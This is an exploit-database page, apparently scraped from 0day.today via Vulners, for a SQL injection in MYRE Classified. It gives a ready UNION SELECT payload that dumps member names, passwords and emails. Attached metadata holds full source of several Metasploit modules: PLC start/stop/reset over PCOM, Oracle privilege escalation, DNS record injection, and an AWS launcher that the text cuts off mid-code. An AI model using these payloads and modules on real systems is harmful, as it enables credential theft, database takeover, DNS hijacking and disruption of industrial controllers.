Search...

MYRE Classified (cat) SQL Injection Vulnerability

2010-02-02T00:00:00

ID 1337DAY-ID-10755
Type zdt
Reporter kaMtiEz
Modified 2010-02-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================
MYRE Classified (cat) SQL Injection Vulnerability
=================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://myrephp.com/
[+] Vulnerability : SQL injection
[+] Dork : "syalalala"
[+] Price : $499          
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/links.php?cat=[INDONESIANCODER]
 
[ Exploit ]
 
-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--
 
===========================================================================



#  0day.today [2018-02-06]  #

JSON Vulners Source

Initial Source

{"hash": "5977cdb799fd8040437398722ee95128d2243613bb683039f54a9b2077d4c1e4", "id": "1337DAY-ID-10755", "lastseen": "2018-02-07T01:06:55", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "98b8a530cbf54181fc8192bf695a0bcc", "key": "href"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "modified"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5dc9e8838629249a8b21d61ebfeb42d7", "key": "reporter"}, {"hash": "995475e4e11367af65a85425283197a9", "key": "sourceData"}, {"hash": "d5f539b41c980bf60d978aecf257aa8f", "key": "sourceHref"}, {"hash": "41db031c701f3bf8650fd543860ea717", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-02-07T01:06:55"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "MSF:AUXILIARY/ADMIN/WEMO/CROCKPOT", "MSF:AUXILIARY/ADMIN/TERADATA/TERADATA_ODBC_SQL", "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "MSF:AUXILIARY/ADMIN/DNS/DYN_DNS_UPDATE", "MSF:AUXILIARY/ADMIN/AWS/AWS_LAUNCH_INSTANCES", "MSF:AUXILIARY/ADMIN/NETBIOS/NETBIOS_SPOOF", "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_DOMAIN_ACCOUNTS_SQLI", "MSF:AUXILIARY/ADMIN/APPLETV/APPLETV_DISPLAY_VIDEO"]}, {"type": "zdt", "idList": ["1337DAY-ID-23612", "1337DAY-ID-23613"]}], "modified": "2018-02-07T01:06:55"}, "vulnersScore": -0.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/10755", "description": "Exploit for unknown platform in category web applications", "title": "MYRE Classified (cat) SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "490e95e1cf094b062801d24ae03087d67cdbe62003a92e4ca16e6c837428c354", "id": "1337DAY-ID-10755", "lastseen": "2016-04-20T00:34:56", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T00:34:56"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2da352442bbb7c0c351fb95ce34fa4be", "key": "href"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "9ffe42217dbbee0e59872bed798cdbaf", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "5dc9e8838629249a8b21d61ebfeb42d7", "key": "reporter"}, {"hash": "7a7118d19496089d9a57c6f2f756be35", "key": "sourceData"}, {"hash": "41db031c701f3bf8650fd543860ea717", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/10755", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "MYRE Classified (cat) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=================================================\r\nMYRE Classified (cat) SQL Injection Vulnerability\r\n=================================================\r\n\r\n###################################################################################\r\n \r\n[ Software Information ]\r\n \r\n[+] Vendor : http://myrephp.com/\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : \"syalalala\"\r\n[+] Price : $499 \r\n[+] Location : INDONESIA - JOGJA\r\n \r\n##################################################################################\r\n \r\n \r\n[ HERE WE GO .. LIVE FROM JOGJA CITY ]\r\n \r\n[ Vulnerable File ]\r\n \r\nhttp://127.0.0.1/[kaMtiEz]/links.php?cat=[INDONESIANCODER]\r\n \r\n[ Exploit ]\r\n \r\n-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--\r\n \r\n===========================================================================\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2010-02-02T00:00:00", "references": [], "reporter": "kaMtiEz", "modified": "2010-02-02T00:00:00", "href": "http://0day.today/exploit/description/10755"}, "lastseen": "2016-04-20T00:34:56", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=================================================\r\nMYRE Classified (cat) SQL Injection Vulnerability\r\n=================================================\r\n\r\n###################################################################################\r\n \r\n[ Software Information ]\r\n \r\n[+] Vendor : http://myrephp.com/\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : \"syalalala\"\r\n[+] Price : $499 \r\n[+] Location : INDONESIA - JOGJA\r\n \r\n##################################################################################\r\n \r\n \r\n[ HERE WE GO .. LIVE FROM JOGJA CITY ]\r\n \r\n[ Vulnerable File ]\r\n \r\nhttp://127.0.0.1/[kaMtiEz]/links.php?cat=[INDONESIANCODER]\r\n \r\n[ Exploit ]\r\n \r\n-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--\r\n \r\n===========================================================================\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "published": "2010-02-02T00:00:00", "references": [], "reporter": "kaMtiEz", "modified": "2010-02-02T00:00:00", "href": "https://0day.today/exploit/description/10755"}

{"metasploit": [{"lastseen": "2019-11-30T12:07:52", "bulletinFamily": "exploit", "description": "Unitronics Vision PLCs allow remote administrative functions to control the PLC using authenticated PCOM commands. This module supports START, STOP and RESET operations.\n", "modified": "2019-02-11T19:46:00", "published": "2019-02-11T19:46:00", "id": "MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "href": "", "type": "metasploit", "title": "Unitronics PCOM remote START/STOP/RESET command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n include Rex::Text\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Unitronics PCOM remote START/STOP/RESET command',\n 'Description' => %q{\n Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.\n },\n 'Author' =>\n [\n 'Luis Rosa <lmrosa[at]dei.uc.pt>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf' ]\n ],\n ))\n\n register_options(\n [\n OptEnum.new('MODE', [true, 'PLC command', 'RESET', ['START', 'STOP', 'RESET']]),\n Opt::RPORT(20256),\n OptInt.new('UNITID', [ false, 'Unit ID (0 - 127)', 0]),\n ])\n end\n\n # compute and return the checksum of a PCOM ASCII message\n def pcom_ascii_checksum(msg)\n (msg.each_byte.inject(:+) % 256 ).to_s(16).upcase.rjust(2, '0')\n end\n\n # compute pcom length\n def pcom_ascii_len(pcom_ascii)\n Rex::Text.hex_to_raw(pcom_ascii.length.to_s(16).rjust(4,'0').unpack('H4H4').reverse.pack('H4H4'))\n end\n\n # return a pcom ascii formatted request\n def pcom_ascii_request(command)\n unit_id = datastore['UNITID'].to_s(16).rjust(2,'0')\n # PCOM/ASCII\n pcom_ascii_payload = \"\" +\n \"\\x2f\" + # '/'\n unit_id +\n command +\n pcom_ascii_checksum(unit_id + command) + # checksum\n \"\\x0d\" # '\\r'\n\n # PCOM/TCP header\n Rex::Text.rand_text_hex(2) + # transaction id\n \"\\x65\" + # ascii (101)\n \"\\x00\" + # reserved\n pcom_ascii_len(pcom_ascii_payload) + # length\n pcom_ascii_payload\n end\n\n def run\n connect\n case datastore['MODE']\n when 'START'\n print_status 'Sending START command'\n ascii_code = \"\\x43\\x43\\x52\" # CCR\n when 'STOP'\n print_status 'Sending STOP command'\n ascii_code = \"\\x43\\x43\\x53\" # CCS\n when 'RESET'\n print_status 'Sending RESET command'\n ascii_code = \"\\x43\\x43\\x45\" # CCE\n else\n print_error \"Unknown MODE\"\n return\n end\n\n sock.put(pcom_ascii_request(ascii_code)) #\n ans = sock.get_once\n if ans.to_s[10,2] == 'CC'\n print_status 'Command accepted'\n end\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/pcom_command.rb"}, {"lastseen": "2019-11-22T17:21:05", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for Belkin Wemo-enabled Crock-Pots by implementing a subset of the functionality provided by the Wemo App. No vulnerabilities are exploited by this Metasploit module in any way.\n", "modified": "2019-03-05T01:25:56", "published": "2018-10-02T03:01:10", "id": "MSF:AUXILIARY/ADMIN/WEMO/CROCKPOT", "href": "", "type": "metasploit", "title": "Belkin Wemo-Enabled Crock-Pot Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Belkin Wemo-Enabled Crock-Pot Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.\n },\n 'Author' => 'wvu',\n 'References' => [\n ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],\n ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],\n ['URL', 'http://www.wemo.com/']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Cook', 'Description' => 'Cook stuff'],\n ['Stop', 'Description' => 'Stop cooking']\n ],\n 'DefaultAction' => 'Cook',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [PHYSICAL_EFFECTS]\n }\n ))\n\n register_options([\n Opt::RPORT(49152),\n OptEnum.new('TEMP', [true, 'Temperature', 'Off', modes.keys]),\n OptInt.new('TIME', [true, 'Cook time in minutes', 0])\n ])\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptBool.new('ForceExploit', [true, 'Override check result', false])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/setup.xml'\n )\n\n if res && res.code == 200 && res.body.include?('urn:Belkin:device:')\n if res.body.include?('urn:Belkin:device:crockpot:1')\n vprint_good('Wemo-enabled Crock-Pot detected')\n return Exploit::CheckCode::Appears\n end\n\n vprint_status('Wemo device detected, but it is not a Crock-Pot')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run\n if datastore['DefangedMode']\n print_error('Running in defanged mode')\n return\n end\n\n checkcode = check\n\n unless checkcode == Exploit::CheckCode::Appears || datastore['ForceExploit']\n print_error(\"#{checkcode[1]}. Set ForceExploit to override.\")\n return\n end\n\n case action.name\n when 'Cook'\n print_status(\"Cooking on #{datastore['TEMP']} for #{datastore['TIME']}m\")\n res = send_request_cook(datastore['TEMP'], datastore['TIME'])\n when 'Stop'\n print_status('Setting temperature to Off and cook time to 0m')\n res = send_request_cook('Off', 0)\n end\n\n unless res && res.code == 200 && (time = res.get_xml_document.at('//time'))\n print_error(\"Failed to #{action.name.downcase}, aborting!\")\n return\n end\n\n print_good(\"Cook time set to #{time.text}m\")\n end\n\n def send_request_cook(temp, time)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/upnp/control/basicevent1',\n 'ctype' => 'text/xml',\n 'headers' => {\n 'SOAPACTION' => '\"urn:Belkin:service:basicevent:1#SetCrockpotState\"'\n },\n 'data' => generate_soap_xml(temp, time)\n )\n end\n\n def generate_soap_xml(temp, time)\n <<~EOF\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body>\n <u:SetCrockpotState xmlns:u=\"urn:Belkin:service:basicevent:1\">\n <mode>#{modes[temp]}</mode>\n <time>#{time}</time>\n </u:SetCrockpotState>\n </s:Body>\n </s:Envelope>\n EOF\n end\n\n def modes\n {\n 'Off' => 0,\n 'Warm' => 50,\n 'Low' => 51,\n 'High' => 52\n }\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/wemo/crockpot.rb"}, {"lastseen": "2019-11-28T14:42:14", "bulletinFamily": "exploit", "description": "SQL query module for ODBC connections to local Teradata databases. Port specification (TCP 1025 by default) is not necessary for ODBC connections. Requires ODBC driver and Python Teradata module.\n", "modified": "2018-09-13T18:09:01", "published": "2018-05-29T15:12:43", "id": "MSF:AUXILIARY/ADMIN/TERADATA/TERADATA_ODBC_SQL", "href": "", "type": "metasploit", "title": "Teradata ODBC SQL Query Module", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n#2018-05-09 14-15\n\n# Standard Modules\nimport logging\n\n# Extra Modules\ndependencies_missing = False\ntry:\n import teradata\nexcept ImportError:\n dependencies_missing = True\n\nfrom metasploit import module\n\n\n# Metasploit Metadata\nmetadata = {\n 'name': 'Teradata ODBC SQL Query Module',\n 'description': '''\n SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.\n ''',\n 'authors': [\n 'Ted Raffle (actuated)'\n ],\n 'date': '2018-03-29',\n 'license': 'MSF_LICENSE',\n 'references': [\n {'type': 'url', 'ref': 'https://developer.teradata.com/tools/reference/teradata-python-module'},\n {'type': 'url', 'ref': 'https://downloads.teradata.com/download/connectivity/odbc-driver/linux'}\n ],\n 'type': 'single_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},\n 'rport': {'type': 'port', 'description': 'Port to target, ignored by the ODBC driver', 'required': True, 'default': 1025},\n 'username': {'type': 'string', 'description': 'Username', 'required': True, 'default': 'dbc'},\n 'password': {'type': 'string', 'description': 'Password', 'required': True, 'default': 'dbc'},\n 'sql': {'type': 'string', 'description': 'SQL query to perform', 'required': True, 'default': 'SELECT DATABASENAME FROM DBC.DATABASES'},\n },\n 'notes': {\n 'AKA': ['Teradata ODBC Authentication Scanner']\n }\n}\n\n\n# Run function\ndef run(args):\n\n # Define UdaExec ODBC connection \"application\", must be before LogHandler\n udaExec = teradata.UdaExec(appName=\"Auth\", version=\"1.0\", logConsole=False, configureLogging=False)\n\n # Metasploit LogHandler\n module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))\n\n # Return error for missing dependency\n if dependencies_missing:\n logging.error('Python Teradata module missing, cannot continue')\n return\n\n # Set variables to current RHOST, and USERNAME and PASSWORD options\n host = args['rhost']\n user = args['username']\n password = args['password']\n\n # Perform login attempt\n module.log(host + ' - ' + user + ':' + password + ' - Starting')\n try:\n session = udaExec.connect(method=\"odbc\", system=host, username=user, password=password);\n except teradata.api.Error as e:\n logging.error(user + ':' + password + ' - ' + format(e))\n return\n else:\n module.log(host + ' - ' + user + ':' + password + ' - Login Successful', level='good')\n try:\n query = args['sql']\n module.log(host + ' - Starting - ' + query)\n for row in session.execute(query):\n outputRow=str(row)\n module.log(host + ' - ' + outputRow, level='good')\n except teradata.api.Error as e:\n logging.error(format(e))\n return\n\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/teradata/teradata_odbc_sql.py"}, {"lastseen": "2019-11-21T16:32:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.\n", "modified": "2018-12-10T17:21:16", "published": "2017-08-07T03:07:46", "id": "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "href": "", "type": "metasploit", "title": "Oracle DB Privilege Escalation via Function-Based Index", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.\n },\n 'Author' =>\n [\n 'David Litchfield', # Vulnerability discovery and exploit\n 'Moshe Kaplan', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],\n ],\n 'DisclosureDate' => 'Jan 21 2015'))\n\n register_options(\n [\n OptString.new('SQL', [ true, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\" ]),\n OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),\n ])\n end\n\n def run\n return unless check_dependencies\n\n func_name = Rex::Text.rand_text_alpha(6..10)\n\n create_function = <<-EOF\n CREATE OR REPLACE FUNCTION #{func_name}\n (FOO varchar) return varchar\n deterministic authid current_user is\n pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL'].gsub(\"'\", \"\\\\\\\\'\")}';\n commit;\n return '';\n end;\n EOF\n\n index_name = Rex::Text.rand_text_alpha(6..10)\n param_value = Rex::Text.rand_text_alpha(2..6)\n\n create_index = \"CREATE INDEX #{index_name} ON \" \\\n \"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))\"\n\n trigger = \"SELECT * FROM #{datastore['TABLE']}\"\n\n clean_index = \"drop index #{index_name}\"\n clean_func = \"drop function #{func_name}\"\n\n print_status('Running exploit...')\n\n begin\n print_status(\"Attempting to create function #{func_name}...\")\n prepare_exec(create_function)\n print_status(\"Attempting to create index #{index_name}...\")\n prepare_exec(create_index)\n print_status('Querying to trigger function...')\n prepare_exec(trigger)\n print_status('Cleaning up index...')\n prepare_exec(clean_index)\n print_status('Cleaning up function...')\n prepare_exec(clean_func)\n print_status('Exploit complete!')\n rescue ::OCIError => e\n print_error(\"Error! #{e.message}\")\n end\n end\n\n def prepare_exec(query)\n print_status(query)\n super\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/oracle_index_privesc.rb"}, {"lastseen": "2019-11-30T12:15:31", "bulletinFamily": "exploit", "description": "This module allows adding and/or deleting a record to any remote DNS server that allows unrestricted dynamic updates.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-22T22:47:04", "id": "MSF:AUXILIARY/ADMIN/DNS/DYN_DNS_UPDATE", "href": "", "type": "metasploit", "title": "DNS Server Dynamic Update Record Injection", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'dnsruby'\n\nclass MetasploitModule < Msf::Auxiliary\n\n def initialize\n super(\n 'Name' => 'DNS Server Dynamic Update Record Injection',\n 'Description' => %q{\n This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.},\n 'Author' => [\n 'King Sabri <king.sabri[at]gmail.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>'\n ],\n 'References' => [\n ['URL', 'http://www.tenable.com/plugins/index.php?view=single&id=35372'],\n ['URL', 'https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject'],\n ['URL', 'https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/'],\n ['URL', 'https://github.com/ChrisTruncer/PenTestScripts/blob/master/DNSInject.py']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['UPDATE', {'Description' => 'Add or update a record. (default)'}],\n ['ADD', {'Description' => 'Add a new record. Fail if it already exists.'}],\n ['DELETE', {'Description' => 'Delete an existing record.'}]\n ],\n 'DefaultAction' => 'UPDATE'\n )\n\n register_options([\n OptString.new('DOMAIN', [true, 'The domain name']),\n OptAddress.new('RHOST', [true, 'The vulnerable DNS server IP address']),\n OptString.new('HOSTNAME', [true, 'The name record you want to add']),\n OptAddress.new('IP', [false, 'The IP you want to assign to the record']),\n OptString.new('VALUE', [false, 'The string to be added with TXT or CNAME record']),\n OptEnum.new('TYPE', [true, 'The record type you want to add.', 'A', ['A', 'AAAA', 'CNAME', 'TXT']]),\n OptAddress.new('CHOST', [false, 'The source address to use for queries and updates'])\n ])\n\n deregister_options('RPORT')\n end\n\n def record_action(type, type_enum, value, action)\n # Send the update to the zone's primary master.\n domain = datastore['DOMAIN']\n fqdn = \"#{datastore['HOSTNAME']}.#{domain}\"\n opts = {nameserver: datastore['RHOST']}\n if datastore['CHOST'] && datastore['CHOST'] != \"\"\n if Rex::Socket.is_ipv4?(datastore['CHOST'])\n opts[:src_address] = datastore['CHOST']\n elsif Rex::Socket.is_ipv6?(datastore['CHOST'])\n opts[:src_address6] = datastore['CHOST']\n end\n end\n resolver = Dnsruby::Resolver.new(opts)\n update = Dnsruby::Update.new(domain)\n updated = false\n case\n when action == :resolve\n begin\n answer = resolver.query(fqdn, type)\n print_good \"Found existing #{type} record for #{fqdn}\"\n return true\n rescue Dnsruby::ResolvError, IOError => e\n print_good \"Did not find an existing #{type} record for #{fqdn}\"\n vprint_error \"Query failed: #{e.message}\"\n return false\n end\n when action == :add\n print_status(\"Sending dynamic DNS add message...\")\n update.absent(\"#{fqdn}.\", type)\n update.add(\"#{fqdn}.\", type_enum, 86400, value)\n begin\n resolver.send_message(update)\n print_good \"The record '#{fqdn} => #{value}' has been added!\"\n updated = true\n rescue Dnsruby::ResolvError, IOError => e\n print_error \"Cannot add #{fqdn}\"\n vprint_error \"The DNS server may not be vulnerable, or there may be a preexisting static record.\"\n vprint_error \"Update failed: #{e.message}\"\n end\n when action == :delete\n begin\n print_status(\"Sending dynamic DNS delete message...\")\n update.present(fqdn, type)\n update.delete(fqdn, type)\n resolver.send_message(update)\n print_good(\"The record '#{fqdn} => #{value}' has been deleted!\")\n updated = true\n rescue Dnsruby::ResolvError, IOError => e\n print_error \"Cannot delete #{fqdn}\"\n vprint_error \"The DNS server may not be vulnerable, or there may be a preexisting static record.\"\n vprint_error \"Update failed: #{e.message}\"\n end\n end\n updated\n end\n\n def update_record(type:, type_enum:, value:, value_name:)\n if value.nil? || value == \"\"\n print_error \"Record type #{type} requires the #{value_name} parameter to be specified\"\n return\n end\n force = datastore['CHOST'] && datastore['CHOST'] != \"\"\n case\n when action.name == 'UPDATE'\n if force\n record_action(type, type_enum, value, :delete)\n record_action(type, type_enum, value, :add)\n else\n if record_action(type, type_enum, value, :resolve)\n if record_action(type, type_enum, value, :delete)\n record_action(type, type_enum, value, :add)\n end\n else\n record_action(type, type_enum, value, :add)\n end\n end\n when action.name == 'ADD'\n if force\n record_action(type, type_enum, value, :add)\n else\n if record_action(type, type_enum, value, :resolve) == false\n record_action(type, type_enum, value, :add)\n else\n print_error \"Record already exists, try DELETE or UPDATE\"\n end\n end\n when action.name == 'DELETE'\n if force\n record_action(type, type_enum, value, :delete)\n else\n if record_action(type, type_enum, value, :resolve)\n record_action(type, type_enum, value, :delete)\n else\n print_error \"Record does not exist, not deleting\"\n end\n end\n end\n end\n\n def run\n ip = datastore['IP']\n value = datastore['VALUE']\n begin\n case\n when datastore['TYPE'] == 'A'\n update_record(type: 'A', type_enum: Dnsruby::Types.A, value: ip, value_name: 'IP')\n when datastore['TYPE'] == 'AAAA'\n update_record(type: 'AAAA', type_enum: Dnsruby::Types.AAAA, value: ip, value_name: 'IP')\n when datastore['TYPE'] == 'CNAME'\n update_record(type: 'CNAME', type_enum: Dnsruby::Types.CNAME, value: value, value_name: 'VALUE')\n when datastore['TYPE'] == 'TXT'\n update_record(type: 'TXT', type_enum: Dnsruby::Types.TXT, value: value, value_name: 'VALUE')\n else\n print_error \"Invalid Record Type!\"\n end\n rescue ArgumentError => e\n print_error(e.message)\n rescue Dnsruby::OtherResolvError\n print_error(\"Connection Refused!\")\n rescue Dnsruby::DecodeError\n print_error(\"Invalid DNS reply, ensure you are connecting to a DNS server\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dns/dyn_dns_update.rb"}, {"lastseen": "2019-11-28T18:58:35", "bulletinFamily": "exploit", "description": "This module will attempt to launch an AWS instances (hosts) in EC2.\n", "modified": "2017-07-24T13:26:21", "published": "2017-03-13T05:57:58", "id": "MSF:AUXILIARY/ADMIN/AWS/AWS_LAUNCH_INSTANCES", "href": "", "type": "metasploit", "title": "Launches Hosts in AWS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/aws/client'\n\nclass MetasploitModule < Msf::Auxiliary\n include Metasploit::Framework::Aws::Client\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"Launches Hosts in AWS\",\n 'Description' => %q{\n This module will attempt to launch an AWS instances (hosts) in EC2.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Javier Godinez <godinezj[at]gmail.com>',\n ],\n 'References' => [\n [ 'URL', 'https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ'],\n [ 'URL', 'https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf' ]\n ]\n )\n )\n register_options(\n [\n OptString.new('AccessKeyId', [true, 'AWS access key', '']),\n OptString.new('SecretAccessKey', [true, 'AWS secret key', '']),\n OptString.new('Token', [false, 'AWS session token', '']),\n OptString.new('RHOST', [true, 'AWS region specific EC2 endpoint', 'ec2.us-west-2.amazonaws.com']),\n OptString.new('Region', [true, 'The default region', 'us-west-2' ]),\n OptString.new(\"AMI_ID\", [true, 'The Amazon Machine Image (AMI) ID', 'ami-1e299d7e']),\n OptString.new(\"KEY_NAME\", [true, 'The SSH key to be used for ec2-user', 'admin']),\n OptString.new(\"SSH_PUB_KEY\", [false, 'The public SSH key to be used for ec2-user, e.g., \"ssh-rsa ABCDE...\"', '']),\n OptString.new(\"USERDATA_FILE\", [false, 'The script that will be executed on start', 'tools/modules/aws-aggregator-userdata.sh'])\n ]\n )\n register_advanced_options(\n [\n OptString.new('RPORT', [true, 'AWS EC2 Endpoint TCP Port', 443]),\n OptBool.new('SSL', [true, 'AWS EC2 Endpoint SSL', true]),\n OptString.new('INSTANCE_TYPE', [true, 'The instance type', 'm3.medium']),\n OptString.new('ROLE_NAME', [false, 'The instance profile/role name', '']),\n OptString.new('VPC_ID', [false, 'The EC2 VPC ID', '']),\n OptString.new('SUBNET_ID', [false, 'The public subnet to use', '']),\n OptString.new('SEC_GROUP_ID', [false, 'The EC2 security group to use', '']),\n OptString.new('SEC_GROUP_CIDR', [true, 'EC2 security group network access CIDR', '0.0.0.0/0']),\n OptString.new('SEC_GROUP_PORT', [true, 'EC2 security group network access PORT', 'tcp:22']),\n OptString.new('SEC_GROUP_NAME', [false, 'Optional EC2 security group name', '']),\n OptInt.new('MaxCount', [true, 'Maximum number of instances to launch', 1]),\n OptInt.new('MinCount', [true, 'Minumum number of instances to launch', 1])\n ]\n )\n 